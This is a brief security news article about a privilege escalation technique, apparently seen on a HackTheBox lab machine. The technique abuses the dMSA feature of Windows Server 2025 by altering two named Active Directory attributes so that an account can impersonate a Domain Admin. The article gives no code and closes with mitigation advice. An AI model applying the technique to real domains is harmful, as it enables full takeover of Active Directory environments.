New Privilege Escalation Technique Targets Windows Server 2025's dMSA Feature

A new privilege escalation technique has been identified on a HackTheBox machine named "Eighteen," targeting Windows Server 2025's Delegation Managed Service Account (dMSA) feature. This technique exploits weaknesses in dMSA attribute management within Active Directory, highlighting a potential vulnerability in Windows Server 2025.

dMSAs are specialized service accounts in Active Directory that offer automated password management and streamlined SPN handling. The discovered technique involves manipulating two critical attributes: msDS-DelegatedMSAState and msDS-ManagedAccountPrecededByLink. By altering these attributes, an attacker can configure a dMSA to impersonate any domain account, including high-privilege accounts such as Domain Admin. This impersonation enables the dMSA to acquire a Kerberos Ticket Granting Ticket (TGT) with the impersonated account's privileges, thereby granting the attacker elevated access.

While this technique was discovered in a lab environment, it underscores a potential vulnerability in Windows Server 2025's dMSA feature. If present in production environments, this vulnerability could allow attackers to gain Domain Admin privileges, leading to full control over the Active Directory environment.

To mitigate this potential vulnerability, organizations should restrict write access to the vulnerable attributes and implement monitoring for unusual changes to these attributes. Additionally, organizations should exercise caution when deploying new features in Windows Server 2025 and conduct comprehensive security assessments before implementation.

This technique highlights the importance of meticulous attribute management in Active Directory and the necessity of robust monitoring and access controls to thwart privilege escalation attacks.